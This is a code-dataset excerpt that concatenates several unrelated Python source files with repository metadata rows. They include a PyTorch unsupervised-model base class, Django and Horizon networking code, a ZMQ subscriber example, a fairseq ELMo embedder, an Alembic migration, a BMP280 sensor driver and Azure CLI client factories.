loss_name='neg_cross_entropy',
metric_names='mrr',
*args,
**kwargs):
Module.__init__(self)
BaseUnsupervised.__init__(self, *args, **kwargs)
self.loss_name = loss_name
if isinstance(metric_names, str):
metric_names = [metric_names]
self.metric_names = metric_names
def target_encoder(self, inputs):
raise NotImplementedError('call abc method')
def context_encoder(self, inputs):
raise NotImplementedError('call abc method')
def compute_logits(self, target, context):
return torch.sum(target * context, dim=-1)
def loss_and_metrics(self, logits, negative_logits):
r'''
\return a dict of loss and metrics
'''
outputs = OrderedDict(
loss=get_loss(self.loss_name)(logits, negative_logits))
for metric_name in self.metric_names:
outputs[metric_name] = get_metric(metric_name)(logits,
negative_logits)
return outputs
def convert_ids_tensor(self, inputs):
if isinstance(inputs, (list, tuple)):
return torch.tensor(inputs, dtype=torch.int64)
if torch.is_tensor(inputs) and inputs.dtype != torch.int64:
return inputs.to(dtype=torch.int64)
return inputs
def convert_features_tensor(self, inputs):
return self.convert_ids_tensor(inputs)
def forward(self, inputs):
return BaseUnsupervised.__call__(self, inputs)
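# --- Usage sketch (not part of the original file) ---
# A subclass only needs to supply the two encoders; compute_logits and
# loss_and_metrics above do the rest. The shared toy embedding table and
# its sizes are hypothetical.
from torch import nn


class ToyUnsupervised(Unsupervised):
    """Minimal subclass: one embedding table for targets and contexts."""

    def __init__(self, num_nodes=100, dim=16, **kwargs):
        super().__init__(**kwargs)
        self.embedding = nn.Embedding(num_nodes, dim)

    def target_encoder(self, inputs):
        return self.embedding(self.convert_ids_tensor(inputs))

    def context_encoder(self, inputs):
        return self.embedding(self.convert_ids_tensor(inputs))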
| 36.0125
| 80
| 0.660535
|
1c49046e7409be20302d3973b96a35a62ee3e76a
| 150
|
py
|
Python
|
school/simpleApi/apps.py
|
kiarashplusplus/PaperPileSchool
|
40f91eea15d743bd22f918cec42e9c778b3d6d7d
|
[
"MIT"
] | null | null | null |
school/simpleApi/apps.py
|
kiarashplusplus/PaperPileSchool
|
40f91eea15d743bd22f918cec42e9c778b3d6d7d
|
[
"MIT"
] | null | null | null |
school/simpleApi/apps.py
|
kiarashplusplus/PaperPileSchool
|
40f91eea15d743bd22f918cec42e9c778b3d6d7d
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class SimpleapiConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'simpleApi'
| 21.428571
| 56
| 0.766667
|
1c49062476515aed231866528eec2b58762011d2
| 4,570
|
py
|
Python
|
openstack_dashboard/dashboards/project/networks/subnets/tables.py
|
aristanetworks/horizon
|
6b4ba5194d46360bf1a436b6f9531facfbf5084a
|
[
"Apache-2.0"
] | null | null | null |
openstack_dashboard/dashboards/project/networks/subnets/tables.py
|
aristanetworks/horizon
|
6b4ba5194d46360bf1a436b6f9531facfbf5084a
|
[
"Apache-2.0"
] | null | null | null |
openstack_dashboard/dashboards/project/networks/subnets/tables.py
|
aristanetworks/horizon
|
6b4ba5194d46360bf1a436b6f9531facfbf5084a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import tables
from horizon.utils import memoized
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class CheckNetworkEditable(object):
"""Mixin class to determine the specified network is editable."""
def allowed(self, request, datum=None):
# Only administrator is allowed to create and manage subnets
# on shared networks.
network = self.table._get_network()
if network.shared:
return False
return True
class DeleteSubnet(CheckNetworkEditable, tables.DeleteAction):
data_type_singular = _("Subnet")
data_type_plural = _("Subnets")
policy_rules = (("network", "delete_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
if datum:
project_id = getattr(datum, 'tenant_id', None)
return {"network:project_id": project_id}
def delete(self, request, obj_id):
try:
api.neutron.subnet_delete(request, obj_id)
except Exception:
msg = _('Failed to delete subnet %s') % obj_id
LOG.info(msg)
network_id = self.table.kwargs['network_id']
redirect = reverse('horizon:project:networks:detail',
args=[network_id])
exceptions.handle(request, msg, redirect=redirect)
class CreateSubnet(CheckNetworkEditable, tables.LinkAction):
name = "create"
verbose_name = _("Create Subnet")
url = "horizon:project:networks:addsubnet"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("network", "create_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
network = self.table._get_network()
if network:
project_id = getattr(network, 'tenant_id', None)
return {"network:project_id": project_id}
def get_link_url(self, datum=None):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id,))
class UpdateSubnet(CheckNetworkEditable, tables.LinkAction):
name = "update"
verbose_name = _("Edit Subnet")
url = "horizon:project:networks:editsubnet"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("network", "update_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
if datum:
project_id = getattr(datum, 'tenant_id', None)
return {"network:project_id": project_id}
def get_link_url(self, subnet):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id, subnet.id))
class SubnetsTable(tables.DataTable):
name = tables.Column("name", verbose_name=_("Name"),
link='horizon:project:networks:subnets:detail')
cidr = tables.Column("cidr", verbose_name=_("Network Address"))
ip_version = tables.Column("ipver_str", verbose_name=_("IP Version"))
gateway_ip = tables.Column("gateway_ip", verbose_name=_("Gateway IP"))
failure_url = reverse_lazy('horizon:project:networks:index')
@memoized.memoized_method
def _get_network(self):
        network_id = self.kwargs['network_id']
        try:
network = api.neutron.network_get(self.request, network_id)
network.set_id_as_name_if_empty(length=0)
except Exception:
msg = _('Unable to retrieve details for network "%s".') \
% (network_id)
exceptions.handle(self.request, msg, redirect=self.failure_url)
return network
class Meta:
name = "subnets"
verbose_name = _("Subnets")
table_actions = (CreateSubnet, DeleteSubnet)
row_actions = (UpdateSubnet, DeleteSubnet)
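# --- Illustration (not part of the original file) ---
# _get_network is consulted both by CheckNetworkEditable.allowed and by
# CreateSubnet.get_policy_target, so memoized_method keeps one table render
# to a single Neutron API round-trip. A rough Python 3 stdlib analogue of
# the pattern (memoized.memoized_method itself lives in horizon.utils):
import functools


class _MemoSketch(object):
    @functools.lru_cache(maxsize=None)   # stand-in for memoized.memoized_method
    def _get_network(self):
        print('expensive API call')      # executed once per instance
        return {'shared': False}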
| 35.153846
| 78
| 0.66674
1c4906852776569e2ce7369dcfd53d2a135ae29a
| 3,279
|
py
|
Python
|
contrib/zmq/zmq_sub3.4.py
|
planbcoin/planbcoin
|
7d132eebdce94f34ca2e74278b5ca09dc012d164
|
[
"MIT"
] | null | null | null |
contrib/zmq/zmq_sub3.4.py
|
planbcoin/planbcoin
|
7d132eebdce94f34ca2e74278b5ca09dc012d164
|
[
"MIT"
] | null | null | null |
contrib/zmq/zmq_sub3.4.py
|
planbcoin/planbcoin
|
7d132eebdce94f34ca2e74278b5ca09dc012d164
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The PlanBcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
ZMQ example using python3's asyncio
Planbcoin should be started with the command line arguments:
planbcoind -testnet -daemon \
-zmqpubhashblock=tcp://127.0.0.1:29067 \
-zmqpubrawtx=tcp://127.0.0.1:29067 \
-zmqpubhashtx=tcp://127.0.0.1:29067 \
        -zmqpubrawblock=tcp://127.0.0.1:29067
We use the asyncio library here. `self.handle()` installs itself as a
future at the end of the function. Since it never returns with the event
loop having an empty stack of futures, this creates an infinite loop. An
alternative is to wrap the contents of `handle` inside `while True`.
The `@asyncio.coroutine` decorator and the `yield from` syntax found here
was introduced in python 3.4 and has been deprecated in favor of the `async`
and `await` keywords respectively.
A blocking example using python 2.7 can be obtained from the git history:
https://github.com/planbcoin/planbcoin/blob/37a7fe9e440b83e2364d5498931253937abe9294/contrib/zmq/zmq_sub.py
"""
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if not (sys.version_info.major >= 3 and sys.version_info.minor >= 4):
print("This example only works with Python 3.4 and greater")
exit(1)
port = 29067
class ZMQHandler():
def __init__(self):
self.loop = zmq.asyncio.install()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
@asyncio.coroutine
def handle(self) :
msg = yield from self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"hashtx":
print('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body))
# schedule ourselves to receive the next message
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
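# --- Sketch (not part of the original file) ---
# The async/await form that the docstring says superseded @asyncio.coroutine
# and `yield from` (python >= 3.5); socket setup stays as in
# ZMQHandler.__init__, and a plain loop replaces re-scheduling a future.
async def handle_async(sub_socket):
    while True:
        msg = await sub_socket.recv_multipart()
        topic, body = msg[0], msg[1]
        print(topic, len(body))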
| 36.433333
| 111
| 0.649588
|
1c490765321bf0d9ddbb802fbb128e59f4873dde
| 12,666
|
py
|
Python
|
fairseq/modules/fb_elmo_token_embedder.py
|
xwhan/fairseq-wklm
|
9c7c927fca75cd2b08c0207ff7f7682ed95a98e0
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/modules/fb_elmo_token_embedder.py
|
xwhan/fairseq-wklm
|
9c7c927fca75cd2b08c0207ff7f7682ed95a98e0
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/modules/fb_elmo_token_embedder.py
|
xwhan/fairseq-wklm
|
9c7c927fca75cd2b08c0207ff7f7682ed95a98e0
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
from typing import Dict, List
import torch
from torch import nn
from fairseq.models import FairseqLanguageModel
from fairseq.utils import buffered_arange
class ElmoTokenEmbedder(nn.Module):
"""
This is an implementation of the ELMo module which allows learning how to combine hidden states of a language model
to learn task-specific word representations.
For more information see the paper here: http://arxiv.org/abs/1802.05365
This implementation was inspired by the implementation in AllenNLP found here:
https://github.com/allenai/allennlp/blob/master/tutorials/how_to/elmo.md
"""
def __init__(
self,
language_model: FairseqLanguageModel,
eos: int,
pad: int,
tune_lm: bool = False,
lm_frozen_layers: int = 0,
lm_tune_embedding: bool = False,
weights_dropout: float = 0.,
final_dropout: float = 0.,
layer_norm: bool = True,
affine_layer_norm: bool = False,
projection_dim: int = None,
apply_softmax: bool = True,
combine_tower_states: bool = True,
add_final_predictive: bool = True,
add_final_context: bool = True,
add_bos: bool = False,
add_eos: bool = False,
remove_bos: bool = False,
remove_eos: bool = False,
char_inputs: bool = False,
max_char_len: int = 50,
use_boundary_tokens: bool = False,
):
super().__init__()
self.onnx_trace = False
self.language_model = language_model
self.eos_idx = eos
self.padding_idx = pad
self.tune_lm = tune_lm
self.combine_tower_states = combine_tower_states
self.add_final_predictive = add_final_predictive
self.add_final_context = add_final_context
self.add_bos = add_bos
self.add_eos = add_eos
self.remove_bos = remove_bos
self.remove_eos = remove_eos
self.char_inputs = char_inputs
# use_boundary_tokens will only use the bos/eos of the ELMO last layer,
# will override some other options in _lm_states and forward,
# for the purpose of fine-tuning the language model
self.use_boundary_tokens = use_boundary_tokens
if self.use_boundary_tokens:
            # make sure bos and eos are not removed in the fine-tuning case
assert (not self.remove_bos)
assert (not self.remove_eos)
self.num_layers = len(language_model.decoder.forward_layers)
if self.add_final_context:
self.num_layers += 1
if not self.combine_tower_states:
self.num_layers *= 2
# +1 for token embedding layer
self.num_layers += 1
if language_model.decoder.self_target and self.add_final_predictive:
self.num_layers += 1
self.dim = language_model.decoder.embed_dim
if not self.use_boundary_tokens and self.combine_tower_states:
self.dim *= 2
self.embedding_dim = projection_dim or self.dim
self.weights_dropout = nn.Dropout(weights_dropout)
self.final_dropout = nn.Dropout(final_dropout)
self.layer_norm = nn.LayerNorm(self.dim, elementwise_affine=affine_layer_norm) if layer_norm else None
if self.use_boundary_tokens:
self.weights = None
self.gamma = None
else:
self.weights = nn.Parameter(torch.ones(self.num_layers))
self.gamma = nn.Parameter(torch.ones(1))
self.softmax = nn.Softmax(dim=0) if apply_softmax else None
self.projection = nn.Linear(self.dim, projection_dim,
bias=False) if projection_dim is not None and projection_dim != self.dim else None
trainable_params, non_trainable_params = self._get_params_by_trainability(
lm_frozen_layers, lm_tune_embedding
)
self.trainable_params_by_layer: List[Dict[str, nn.Parameter]] = trainable_params
for p in non_trainable_params:
p.requires_grad = False
if not tune_lm:
language_model.eval()
def _get_params_by_trainability(self, lm_frozen_layers, lm_tune_embedding):
non_lm_params = self._non_lm_parameters()
if not self.tune_lm:
# Only non-lm parameters are trainable
return [non_lm_params], self.language_model.parameters()
if not hasattr(self.language_model, "get_layers_by_depth_for_fine_tuning"):
assert lm_frozen_layers == 0
# All params are trainable
return [dict(self.named_parameters())], []
lm_params_by_layer = self._lm_parameters_by_layer()
assert len(lm_params_by_layer) >= lm_frozen_layers + 1 # +1 for embedding
trainable_lm_params = []
non_trainable_lm_params = []
if lm_tune_embedding:
trainable_lm_params.append(lm_params_by_layer[0])
else:
non_trainable_lm_params.append(lm_params_by_layer[0])
trainable_lm_params.extend(lm_params_by_layer[lm_frozen_layers + 1:])
non_trainable_lm_params.extend(lm_params_by_layer[1: lm_frozen_layers + 1])
trainable_params = trainable_lm_params + [non_lm_params]
non_trainable_params = [
p for param_dict in non_trainable_lm_params for p in param_dict.values()
]
return trainable_params, non_trainable_params
def _non_lm_parameters(self):
non_lm_parameters = dict(self.named_parameters())
for name, _ in self.language_model.named_parameters():
del non_lm_parameters["language_model.%s" % name]
return non_lm_parameters
def _lm_parameters_by_layer(self):
lm_layers = self.language_model.get_layers_by_depth_for_fine_tuning()
return [
{
"language_model.%s.%s" % (module_name, param_name): param
for module_name, module in lm_layer.items()
for param_name, param in module.named_parameters()
}
for lm_layer in lm_layers
]
def prepare_for_onnx_export_(self):
self.onnx_trace = True
def reset_parameters(self):
if self.projection:
nn.init.xavier_normal_(self.projection.weight)
if self.softmax is None:
nn.init.constant_(self.weights, 1 / (self.num_layers * 2))
def _lm_states(self, input: torch.Tensor, eos_idx_mask=None):
"""apply the language model on the input and get internal states
Args:
input: the sentence tensor
eos_idx_mask: the mask for the index of eos for each sentence
Returns:
return a list of states from the language model,
if use_boundary_tokens, only return the last layer
if combine_tower_states, will combine forward and backward
"""
if self.tune_lm:
x, model_out = self.language_model(input, src_lengths=None)
else:
with torch.no_grad():
x, model_out = self.language_model(input, src_lengths=None)
if self.use_boundary_tokens:
bos_state = x[:, 0, :]
if eos_idx_mask is None:
return [bos_state.unsqueeze(1)]
eos_state = x[eos_idx_mask] # batch_size * embeding_size
return [torch.cat((bos_state.unsqueeze(1), eos_state.unsqueeze(1)), dim=1)]
assert 'inner_states' in model_out
# TBC -> BTC
states = [s.transpose(0, 1) for s in model_out['inner_states']]
has_final_predictive = len(states) % 2 == 0
if self.add_final_context:
zeros = states[-1].new_zeros(states[-1].size(0), 1, states[-1].size(2))
if states[-1].size(1) == 1:
s1 = s2 = zeros
else:
s1 = torch.cat([zeros, states[-1][:, :-1, :]], dim=1)
s2 = torch.cat([states[-1][:, 1:, :], zeros], dim=1)
if has_final_predictive:
states.insert(-1, s1)
states.insert(-1, s2)
else:
states.extend([s1, s2])
if self.combine_tower_states:
new_states = [torch.cat([states[0], states[0]], dim=-1)]
start = 1 # first element is the token embeddings
end = len(states)
if has_final_predictive:
end -= 1
for i in range(start, end, 2):
new_states.append(torch.cat([states[i], states[i + 1]], dim=-1))
if self.add_final_predictive and has_final_predictive:
new_states.append(torch.cat([states[-1], states[-1]], dim=-1))
states = new_states
elif not self.add_final_predictive and has_final_predictive:
states = states[:-1]
return states
def _with_sentence_boundaries(
self,
input: torch.Tensor):
"""
Args:
input: the sentence Tensor
it's bs * seq_len * num_chars in case of char input and bs*seq_len in case of token input
Returns:
tuple,
1) processed input,
2) tensor mask for the eos position of each sentence,
None if did not add eos
"""
if not self.add_bos and not self.add_eos:
return input, None
zero_block = input.new(0, 0)
block_size = (input.size(0), 1, input.size(2)) if self.char_inputs else (input.size(0), 1)
bos_block = torch.full(block_size, self.eos_idx).type_as(input) if self.add_bos else zero_block
pad_block = torch.full(block_size, self.padding_idx).type_as(input) if self.add_eos else zero_block
# add eos in the beginning and pad to the end of the sentence
input = torch.cat([bos_block, input, pad_block], dim=1)
first_pads = None # if not add_eos, then first_pads is not valid, set to None
if self.add_eos:
index_block = input[:, :, 0] if self.char_inputs else input
padding_mask = index_block.eq(self.padding_idx)
num_pads = padding_mask.long().sum(dim=1, keepdim=True)
max_len = input.size(1)
# index of the first pad
if self.onnx_trace:
first_pads = torch._dim_arange(input, 1).type_as(input).view(1, -1).\
repeat(input.size(0), 1).eq(max_len - num_pads)
eos_indices = first_pads
if self.char_inputs:
eos_indices = eos_indices.unsqueeze(2).repeat(1, 1, input.size(-1))
input = torch.where(eos_indices, torch.Tensor([self.eos_idx]).type_as(input), input)
else:
first_pads = buffered_arange(max_len).type_as(input).view(1, -1).\
expand(input.size(0), -1).eq(max_len - num_pads)
eos_indices = first_pads
if self.char_inputs:
eos_indices = eos_indices.unsqueeze(2).expand_as(input)
input[eos_indices] = self.eos_idx
return input, first_pads
def _without_sentence_boundaries(
self,
input: torch.Tensor,
):
if self.remove_bos:
# remove first token (beginning eos)
input = input[:, 1:]
if self.remove_eos:
# just remove last one to match size since downstream task
# needs to deal with padding value
input = input[:, :-1]
return input
def forward(
self,
input: torch.Tensor,
):
input, eos_idx_mask = self._with_sentence_boundaries(input)
states = self._lm_states(input, eos_idx_mask)
if self.use_boundary_tokens:
return states[0] # only have one element and return it
if self.layer_norm is not None:
states = [self.layer_norm(s) for s in states]
if self.softmax is not None:
w = self.softmax(self.weights)
else:
w = self.weights
w = self.weights_dropout(w)
x = states[0].new_zeros(input.size()[:2] + (self.dim,))
for i in range(len(states)):
x += states[i] * w[i]
x = self._without_sentence_boundaries(x)
if self.projection is not None:
x = self.projection(x)
x = self.gamma * x
x = self.final_dropout(x)
return x
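# --- Illustration (not part of the original file) ---
# The heart of forward() above is the ELMo scalar mix from the paper:
#     ELMo = gamma * sum_i softmax(w)_i * h_i
# A self-contained shape check with a hypothetical 3-layer stack:
demo_states = [torch.randn(2, 5, 8) for _ in range(3)]   # (batch, seq, dim)
demo_w = torch.softmax(torch.ones(3), dim=0)             # weights sum to 1
demo_gamma = torch.ones(1)
demo_mix = demo_gamma * sum(h * w_i for h, w_i in zip(demo_states, demo_w))
print(demo_mix.shape)                                    # torch.Size([2, 5, 8])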
| 37.362832
| 119
| 0.614085
|
1c49078093350cc356b92ffcba2ca52a4bbe112b
| 598
|
py
|
Python
|
application/functions/utils.py
|
HM-SYS/Hackathon2018
|
9cac5db855f8ca7c4a65061eba4a2e9ab60721b9
|
[
"Apache-2.0"
] | 3
|
2018-09-18T00:27:18.000Z
|
2018-10-26T12:15:42.000Z
|
application/functions/utils.py
|
HM-SYS/Hackathon2018
|
9cac5db855f8ca7c4a65061eba4a2e9ab60721b9
|
[
"Apache-2.0"
] | 12
|
2018-09-05T06:08:43.000Z
|
2021-03-31T06:54:07.000Z
|
application/functions/utils.py
|
HM-SYS/Hackathon2018
|
9cac5db855f8ca7c4a65061eba4a2e9ab60721b9
|
[
"Apache-2.0"
] | 5
|
2018-09-01T09:41:40.000Z
|
2018-10-07T11:45:36.000Z
|
import os
import cv2
def load_image(file_path):
module_dir, _ = os.path.split(os.path.realpath(__file__))
absolute_path = os.path.join(module_dir, file_path)
image = cv2.imread(absolute_path)
# (h, w, c), uint8
# Change BGR to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def save_image(image, file_path):
module_dir, _ = os.path.split(os.path.realpath(__file__))
absolute_path = os.path.join(module_dir + "/../..", file_path)
# Change RGB to BGR
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
cv2.imwrite(absolute_path, image)
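# --- Usage sketch (not part of the original file) ---
# Round-trip through the helpers above; the file names are hypothetical and
# are resolved relative to this module (load) and the project root (save).
if __name__ == '__main__':
    image = load_image('sample.png')        # BGR on disk -> RGB in memory
    save_image(image, 'sample_copy.png')    # RGB in memory -> BGR on disk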
| 29.9
| 66
| 0.692308
|
1c490794f5f23d7f2b260743a6cdd0d3790f83c1
| 2,967
|
py
|
Python
|
lib/bmp280.py
|
natnqweb/Circuitpython-bmp280
|
9a79e1f6b5f0d53628d0e3a9f4fa0fdf65c82179
|
[
"Apache-2.0"
] | null | null | null |
lib/bmp280.py
|
natnqweb/Circuitpython-bmp280
|
9a79e1f6b5f0d53628d0e3a9f4fa0fdf65c82179
|
[
"Apache-2.0"
] | null | null | null |
lib/bmp280.py
|
natnqweb/Circuitpython-bmp280
|
9a79e1f6b5f0d53628d0e3a9f4fa0fdf65c82179
|
[
"Apache-2.0"
] | null | null | null |
import time
import board
from Simpletimer import simpletimer
import busio
import adafruit_bmp280
from digitalio import DigitalInOut, Direction, Pull
class BMP280:
def __init__(self,device_address=0x76,scl=board.GP5,sda=board.GP4,led_pin=board.GP25,sea_level_pressure=1017,temp_offset=-2.7):
self.device_address=device_address
self.temp_offset=temp_offset
self.ledpin=led_pin
self.led = DigitalInOut(self.ledpin)
self.led.direction = Direction.OUTPUT
self.timer1 = simpletimer()
self.timer2 = simpletimer()
self.SCL = scl
self.SDA = sda
self.i2c = busio.I2C(scl=self.SCL, sda=self.SDA)
self.bmp280 = adafruit_bmp280.Adafruit_BMP280_I2C(
self.i2c, address=device_address)
# change this to match the location's pressure (hPa) at sea level
self.bmp280.sea_level_pressure = sea_level_pressure
def print_current_settings(self):
self.current_settings=[self.bmp280.sea_level_pressure, self.SCL,self.SDA,self.temp_offset,self.device_address]
print(f"location sea level pressure:{self.bmp280.sea_level_pressure}\nselected SCL pin:{self.SCL}\nselected SDA pin:{self.SDA}\ntemperature offset:{self.temp_offset}\ndevice adress:{hex(self.device_address)}")
def blink(self, delay_=500):
if self.timer2.timer(delay_):
self.led.value = not self.led.value
#print(f"led state is:{led.value}")
def start_print_loop(self,print_refresh=2000,blink_refresh=300):
while True:
if self.timer1.timer(print_refresh):
self.temperature = self.bmp280.temperature+self.temp_offset
print("\nTemperature: %0.1f C" % self.temperature)
print("Pressure: %0.1f hPa" % self.bmp280.pressure)
print("Altitude = %0.2f meters" % self.bmp280.altitude)
self.blink(blink_refresh)
def read_and_print_sensor(self):
self.temperature = self.bmp280.temperature+self.temp_offset
print("\nTemperature: %0.1f C" % self.temperature)
print("Pressure: %0.1f hPa" % self.bmp280.pressure)
print("Altitude = %0.2f meters" % self.bmp280.altitude)
self.return_value=[self.temperature,self.bmp280.pressure,self.bmp280.altitude]
return self.return_value
def read_all(self):
self.temperature = self.bmp280.temperature+self.temp_offset
self.return_value=[self.temperature,self.bmp280.pressure,self.bmp280.altitude]
return self.return_value
def get_temperature(self):
self.temperature = self.bmp280.temperature+self.temp_offset
return self.temperature
def get_pressure(self):
self.pressure=self.bmp280.pressure
return self.pressure
def get_altitude(self):
self.altitude=self.bmp280.altitude
return self.altitude
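# --- Usage sketch (not part of the original file) ---
# Assumes the default wiring (sensor at 0x76 on GP4/GP5, LED on GP25);
# sea_level_pressure below is a hypothetical local value in hPa.
if __name__ == '__main__':
    sensor = BMP280(sea_level_pressure=1013.25)
    print(sensor.get_temperature())   # degrees C, temp_offset applied
    print(sensor.get_pressure())      # hPa
    print(sensor.get_altitude())      # metres, from sea_level_pressure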
| 43
| 218
| 0.667004
|
1c4907d49248464dc73ddb83b04157b6a1e21988
| 970
|
py
|
Python
|
migrations/versions/c0a92da5ac69_create_request_table.py
|
uc-cdis/requestor
|
2054de283b37bb97243f1fe7305d42d8fdfa1888
|
[
"Apache-2.0"
] | 2
|
2021-03-04T23:08:50.000Z
|
2021-07-12T13:48:06.000Z
|
migrations/versions/c0a92da5ac69_create_request_table.py
|
uc-cdis/requestor
|
2054de283b37bb97243f1fe7305d42d8fdfa1888
|
[
"Apache-2.0"
] | 25
|
2020-08-24T20:18:23.000Z
|
2022-02-17T23:34:52.000Z
|
migrations/versions/c0a92da5ac69_create_request_table.py
|
uc-cdis/requestor
|
2054de283b37bb97243f1fe7305d42d8fdfa1888
|
[
"Apache-2.0"
] | null | null | null |
"""create request table
Revision ID: c0a92da5ac69
Revises:
Create Date: 2020-08-18 13:40:12.031174
"""
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "c0a92da5ac69"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"requests",
sa.Column("request_id", postgresql.UUID(), nullable=False),
sa.Column("username", sa.String(), nullable=False),
sa.Column("resource_path", sa.String(), nullable=False),
sa.Column("resource_id", sa.String()),
sa.Column("resource_display_name", sa.String()),
sa.Column("status", sa.String(), nullable=False),
sa.Column("created_time", sa.DateTime(), nullable=False),
sa.Column("updated_time", sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint("request_id"),
)
def downgrade():
op.drop_table("requests")
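# Typical invocations for this revision (illustrative; assumes an
# alembic.ini already pointing at the requestor database):
#   alembic upgrade c0a92da5ac69   # apply this migration
#   alembic downgrade base         # revert it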
| 26.944444
| 67
| 0.679381
|
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
revision = "c0a92da5ac69"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"requests",
sa.Column("request_id", postgresql.UUID(), nullable=False),
sa.Column("username", sa.String(), nullable=False),
sa.Column("resource_path", sa.String(), nullable=False),
sa.Column("resource_id", sa.String()),
sa.Column("resource_display_name", sa.String()),
sa.Column("status", sa.String(), nullable=False),
sa.Column("created_time", sa.DateTime(), nullable=False),
sa.Column("updated_time", sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint("request_id"),
)
def downgrade():
op.drop_table("requests")
| true
| true
|
1c4909f1abd01799b2eb57c4291d44dbf66be59e
| 4,478
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/acs/_client_factory.py
|
heaths/azure-cli
|
baae1d17ffc4f3abfeccea17116bfd61de5770f1
|
[
"MIT"
] | 1
|
2019-11-15T17:28:05.000Z
|
2019-11-15T17:28:05.000Z
|
src/azure-cli/azure/cli/command_modules/acs/_client_factory.py
|
heaths/azure-cli
|
baae1d17ffc4f3abfeccea17116bfd61de5770f1
|
[
"MIT"
] | 1
|
2021-06-02T00:40:34.000Z
|
2021-06-02T00:40:34.000Z
|
src/azure-cli/azure/cli/command_modules/acs/_client_factory.py
|
heaths/azure-cli
|
baae1d17ffc4f3abfeccea17116bfd61de5770f1
|
[
"MIT"
] | 1
|
2019-11-25T19:33:05.000Z
|
2019-11-25T19:33:05.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.parameters import get_resources_in_subscription
from azure.cli.core.profiles import ResourceType
from knack.util import CLIError
def cf_compute_service(cli_ctx, *_):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_COMPUTE)
def cf_container_services(cli_ctx, *_):
return get_container_service_client(cli_ctx).container_services
def cf_managed_clusters(cli_ctx, *_):
return get_container_service_client(cli_ctx).managed_clusters
def cf_agent_pools(cli_ctx, *_):
return get_container_service_client(cli_ctx).agent_pools
def cf_openshift_managed_clusters(cli_ctx, *_):
return get_osa_container_service_client(cli_ctx).open_shift_managed_clusters
def cf_resource_groups(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resource_groups
def cf_resources(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resources
def cf_container_registry_service(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_CONTAINERREGISTRY,
subscription_id=subscription_id)
def get_auth_management_client(cli_ctx, scope=None, **_):
import re
subscription_id = None
if scope:
matched = re.match('/subscriptions/(?P<subscription>[^/]*)/', scope)
if matched:
subscription_id = matched.groupdict()['subscription']
